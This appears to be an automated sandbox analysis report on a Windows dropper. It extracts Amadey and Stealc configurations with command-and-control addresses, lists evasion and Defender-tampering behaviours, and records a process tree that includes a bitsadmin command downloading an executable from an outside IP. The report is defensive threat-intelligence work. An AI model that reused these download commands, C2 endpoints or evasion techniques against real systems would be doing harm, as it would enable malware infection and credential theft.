Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 21:02

General

  • Target

    f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe

  • Size

    7.1MB

  • MD5

    2cd13c7beaf13788651564bcce8e7080

  • SHA1

    752832331e65afbe43a5aa718aec239104fdd4cd

  • SHA256

    f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24a

  • SHA512

    0738d5dfc56a52a8d82efd00b8e36143bea02b2072f4b09d4389ada0372dba6c9b5c2e627377faef09dc5baeba5f34c577f4a6aa4ae60d9871e946749392086c

  • SSDEEP

    196608:x8cVdeT8BCfJLyXh6lywed3tO4J2ALop39SQ+uZ0ZMAQj+x:x8lTT6rltODcopvXC8+

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe
    "C:\Users\Admin\AppData\Local\Temp\f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:556
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u9Z12.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u9Z12.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3464
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\F6C75.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\F6C75.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2064
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1v97l6.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1v97l6.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1256
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2804
            • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
              "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:776
              • C:\Users\Admin\AppData\Local\Temp\is-F6DJ2.tmp\stories.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-F6DJ2.tmp\stories.tmp" /SL5="$702B6,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:4560
                • C:\Windows\SysWOW64\net.exe
                  "C:\Windows\system32\net.exe" pause video_jet_1235
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1752
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 pause video_jet_1235
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:1116
                • C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe
                  "C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:3996
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\ReUploaded_MrAnon.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4084
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 600
                7⤵
                • Program crash
                PID:1712
            • C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe
              "C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:760
              • C:\Windows\SysWOW64\ping.exe
                ping -n 1 8.8.8.8
                7⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:4328
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:3364
            • C:\Users\Admin\AppData\Local\Temp\1011752001\b33dcfc574.exe
              "C:\Users\Admin\AppData\Local\Temp\1011752001\b33dcfc574.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3228
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2h0715.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2h0715.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:3588
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 1560
            5⤵
            • Program crash
            PID:1592
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 1740
            5⤵
            • Program crash
            PID:1064
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3E10n.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3E10n.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4292
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4F842a.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4F842a.exe
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Windows security modification
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3932
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3588 -ip 3588
    1⤵
      PID:4116
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3588 -ip 3588
      1⤵
        PID:980
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4084 -ip 4084
        1⤵
          PID:3944
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:980
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:4680

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe

          Filesize

          3.4MB

          MD5

          7ad720a71ec040facb3e4d4fede86a9e

          SHA1

          9cd9d5ac38a8747d12f1ee26db00388fe8908b05

          SHA256

          2b928ea45d822911163856aac9ba7a1f524f5255da94e8ae34e23784c8e6450b

          SHA512

          f6c52a3eafdfb509fc8f331a525e9550627e203dafe451a1148c118e4cc6167cc56b1ff9a1f720598e35192508935f6898bea65e9bf041c69ee84fb65892242f

        • C:\Users\Admin\AppData\Local\Temp\1011428021\ReUploaded_MrAnon.cmd

          Filesize

          1.1MB

          MD5

          7766e0663a3c658152e1b956ae8f28d6

          SHA1

          0efb9aac1e0980d94e5f8559c064e7719636ec04

          SHA256

          a56eaa4ac24a721f658e9b28e76588a2452d5b335261c18b9d4a2a3c026e7c21

          SHA512

          6256313c0c609eca7e33c028097bce7c72a8288456c1c93a041cb3ca8a5369c46bf5866000d01800f4cc0306f51eb84333a721efc3cd47496969f27d9184ab47

        • C:\Users\Admin\AppData\Local\Temp\1011459001\13a60a1872.exe

          Filesize

          1.1MB

          MD5

          bad75823a737847eeddc8ff78bf27b88

          SHA1

          7e6e0301f6528f9bad44609f53a0a83094e3ce19

          SHA256

          9228adafbb11b5c9962e3361a472c272acff3e977cd79444f9ff470bee1f5ec5

          SHA512

          8d7ee583f4f62892055a04d0cdb298fa0903c03b5a36059a28af922bec7a75b2eb4679ae01e4e60af12ec9e24b40c6af0dd1fa30321f97a4867f8e9f9b32bd5f

        • C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe

          Filesize

          42KB

          MD5

          dd587632bd83be28e06fc74be5ffe634

          SHA1

          9ffc068a93bcd0b880ab1113a1082a9823bfb16f

          SHA256

          21236dee121b0f9fe9cf21093f857d092bb9c56b57b59c52d65ec204408c15a7

          SHA512

          d93bd61d9dabe3fa53bd8e63a509c760dce09c8091d6236ac1370147b075fe2a5c48ee756ac09c4a3bb7923dc53d3f20d4a213cac0b24fe37efba29e09941882

        • C:\Users\Admin\AppData\Local\Temp\1011752001\b33dcfc574.exe

          Filesize

          4.2MB

          MD5

          00829e9f170e0593b78455648bef936d

          SHA1

          b3f33c860a7daf6dc51235930532e39f2031f009

          SHA256

          5b7938dc4feb9b3ff8ecc707d77c9fcd5318fc63c092302a7773e4de344b7e08

          SHA512

          51592e7871490ceeb4b0a71e7a3a43ece82988d7047768d80b20f6046d862e8514e3c161a3f3a3545f673422154aa2355aba684bc9e3e45d6d4c1e5ec7a2e6e6

        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4F842a.exe

          Filesize

          2.7MB

          MD5

          8ae897f5e66bd28f031b43ac4b58e322

          SHA1

          70d2fd9ee78145715da4a6d6fb5132b184a1ad28

          SHA256

          8f27938095cae53183677c487e3b2930e3e8f4df3a95a3b43b1586cc15a7eb70

          SHA512

          72daf56d09cbf924329d2ea0ebbb53347be3e7e84f77d2e6e3f959151a1a1d40b5eb45098d5bff73b432c22ad95bca0ae3b034ddb6ac19e062e38721388696d2

        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u9Z12.exe

          Filesize

          5.5MB

          MD5

          c981df2350d12a579384c328a2aa6a8a

          SHA1

          0e1588c293ef7c45b4be50324d1a87e7f6d26f58

          SHA256

          488f2a37cea00135d2038e908c0735a359e31940152d616897e0d011567ed6ad

          SHA512

          8a5cb4dfccca37c1db1a03820da399a49abdad5e4fe949477554e16100116f8e5e74b05e3c5a149e5fc48cd0f7f43b5d6d3eb7555a5d4c165e9e6ba7a9e749d1

        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3E10n.exe

          Filesize

          1.7MB

          MD5

          393f5ee48f2ae353b9a4adcc51cb789f

          SHA1

          f522e95e1d96015019e5af3de8da8cecbaee8f68

          SHA256

          59c47a02f630bcdabbb284a05d486479e7e507d9510e246d2c4bc48ad49984bf

          SHA512

          e19a4831ee81a4df5ff75c5000cdd6f2f30e0433afb6f008f45916e838030cad1867e4f55d5a15092fe51e87fb64263fe97fcb3c3f6eb0681ae7d8fcf4968aae

        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\F6C75.exe

          Filesize

          3.7MB

          MD5

          cab7ef0b2d1e9ebb5059d7f400674b92

          SHA1

          51922c0b904389728d43eb2ba9acc99dab90c7fe

          SHA256

          65fac26a5369e8fdafdd18b29b3445f7640afd8efa91e1b4db4f4a102ccdde26

          SHA512

          cf0a3c5246488e717c1f9d016a63f8b99a2671b033874c99667c87fd3d29f05f9c8de8bd2d7f604414633e28c4c151858a58f1dca01dc7bd403a45eb4b4baf27

        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1v97l6.exe

          Filesize

          1.8MB

          MD5

          4a621d7648695348889cf9b0af6c97eb

          SHA1

          428888c9ef81ec58bfc32036013520465c66a9b7

          SHA256

          8310a7193b9e91be4355931fe56b6f47b98839621df007f1bd87dda98dff79ed

          SHA512

          f8d4f403f7f6ac220c0653a4fa78eb363a7bf7c4f3aab3a70b1393bc183f94bff186549ef5fe8899deb954f325a8f1c31321d5af36f40b3b983b5999309e4784

        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2h0715.exe

          Filesize

          1.8MB

          MD5

          1762da739387a4d17fe8cc7145e35b88

          SHA1

          4b595b0b0f34485910adac82907fcac664ba35a6

          SHA256

          6edffa2f937dec4542b31e8d544e3bdae845a046b7a7e33006b5fbc9ffef18de

          SHA512

          5fd84b69b62044c9a1c389f075f6f823899bd85ea018b065880b6f8b7676a1c97fa9c4958dd476314cd77aa6f3d96a0becea466b003a3cc46db0296a536f2734

        • C:\Users\Admin\AppData\Local\Temp\is-F6DJ2.tmp\stories.tmp

          Filesize

          689KB

          MD5

          60036d8f272457648671fec6fd8215f4

          SHA1

          3685338ef75edde50c8ab794bdcc73f70ba36bd3

          SHA256

          e3384fe9466d2b9f88428a30d6068b496f405a826dd221160b9f307050cce2f1

          SHA512

          711d4dd2d92d512fd9b19f44b9568afacc03a50842495a983398523cb6b0b3bcc6fe3e66deb2cc044924e40c96b7c7ada80540e72902b8438a4e8e073ea21358

        • C:\Users\Admin\AppData\Local\Temp\is-NM658.tmp\_isetup\_iscrypt.dll

          Filesize

          2KB

          MD5

          a69559718ab506675e907fe49deb71e9

          SHA1

          bc8f404ffdb1960b50c12ff9413c893b56f2e36f

          SHA256

          2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

          SHA512

          e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

        • C:\Users\Admin\AppData\Local\Temp\nso336B.tmp\nsExec.dll

          Filesize

          7KB

          MD5

          11092c1d3fbb449a60695c44f9f3d183

          SHA1

          b89d614755f2e943df4d510d87a7fc1a3bcf5a33

          SHA256

          2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

          SHA512

          c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

        • C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\sqlite3.dll

          Filesize

          630KB

          MD5

          e477a96c8f2b18d6b5c27bde49c990bf

          SHA1

          e980c9bf41330d1e5bd04556db4646a0210f7409

          SHA256

          16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

          SHA512

          335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

        • C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe

          Filesize

          3.0MB

          MD5

          10f6ceca4937e70420e96a5a8b7ce0e6

          SHA1

          7c3e45cb90a50c2e5827810bd5283ce19a0a5bec

          SHA256

          c7d6349a697fe0b43db1054f4e4ba1bb785dbbd623b6cb6d5964315e80722020

          SHA512

          d4a84f15c36c88796e87daf9013e0cc83b4995ab93e0092241146d7ec67611ee1a70645549c22ffbc8bcfbad59ed12c712f836a140f0ee6e900226026500197d

        • memory/776-144-0x0000000000400000-0x0000000000414000-memory.dmp

          Filesize

          80KB

        • memory/776-73-0x0000000000400000-0x0000000000414000-memory.dmp

          Filesize

          80KB

        • memory/980-157-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/1256-35-0x00000000009A0000-0x0000000000E51000-memory.dmp

          Filesize

          4.7MB

        • memory/1256-20-0x00000000009A0000-0x0000000000E51000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-41-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-172-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-33-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-155-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-217-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-162-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-130-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-198-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-40-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-167-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-190-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-185-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/2804-177-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/3228-258-0x0000000000680000-0x0000000001337000-memory.dmp

          Filesize

          12.7MB

        • memory/3588-39-0x0000000000ED0000-0x000000000137F000-memory.dmp

          Filesize

          4.7MB

        • memory/3588-43-0x0000000000ED0000-0x000000000137F000-memory.dmp

          Filesize

          4.7MB

        • memory/3588-45-0x0000000000ED0000-0x000000000137F000-memory.dmp

          Filesize

          4.7MB

        • memory/3932-54-0x0000000000B40000-0x0000000000DF2000-memory.dmp

          Filesize

          2.7MB

        • memory/3932-150-0x0000000000B40000-0x0000000000DF2000-memory.dmp

          Filesize

          2.7MB

        • memory/3932-88-0x0000000000B40000-0x0000000000DF2000-memory.dmp

          Filesize

          2.7MB

        • memory/3932-87-0x0000000000B40000-0x0000000000DF2000-memory.dmp

          Filesize

          2.7MB

        • memory/3932-134-0x0000000000B40000-0x0000000000DF2000-memory.dmp

          Filesize

          2.7MB

        • memory/3996-117-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-116-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-153-0x0000000060900000-0x0000000060992000-memory.dmp

          Filesize

          584KB

        • memory/3996-180-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-182-0x0000000002220000-0x00000000022C1000-memory.dmp

          Filesize

          644KB

        • memory/3996-152-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-188-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-260-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-165-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-154-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-196-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-170-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-201-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-175-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/3996-160-0x0000000000400000-0x00000000006FB000-memory.dmp

          Filesize

          3.0MB

        • memory/4292-50-0x0000000000460000-0x0000000000B03000-memory.dmp

          Filesize

          6.6MB

        • memory/4292-49-0x0000000000460000-0x0000000000B03000-memory.dmp

          Filesize

          6.6MB

        • memory/4560-151-0x0000000000400000-0x00000000004BC000-memory.dmp

          Filesize

          752KB

        • memory/4680-193-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB

        • memory/4680-192-0x0000000000F50000-0x0000000001401000-memory.dmp

          Filesize

          4.7MB